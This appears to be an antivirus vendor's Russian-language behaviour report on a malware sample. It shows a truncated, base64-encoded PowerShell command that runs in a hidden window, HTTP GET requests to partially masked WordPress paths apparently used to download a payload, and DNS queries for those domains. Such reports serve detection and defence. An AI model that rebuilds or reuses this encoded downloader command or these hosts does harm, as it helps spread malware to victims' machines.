Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAHUAYQBlAHQAaAB0AGgAYQBlAGcAbQBlAG8AdwA9ACcAagBvAG8AZwBwAG8AdQBiAHcAYQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBgAEUAQwB1AHIASQB0AHkAcAByAG...
Сетевая активность
TCP
Запросы HTTP GET
- http://to####emusic.com/wp-content/7Bp248/
- http://www.to####emusic.com/wp-content/7Bp248/
- http://cf###udio.com/cfo1/Cnn491117/
- http://ch###home.com/wvw/TpU8MWQE/
- http://th##eus.com/private/OWAZu8/
- http://th###mes.com/JLxLQaaKG/
UDP
- DNS ASK to####emusic.com
- DNS ASK cf###udio.com
- DNS ASK ch###home.com
- DNS ASK th##eus.com
- DNS ASK th###mes.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAHUAYQBlAHQAaAB0AGgAYQBlAGcAbQBlAG8AdwA9ACcAagBvAG8AZwBwAG8AdQBiAHcAYQB1AHoAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBgAEUAQwB1AHIASQB0AHkAcAByAG...' (со скрытым окном)
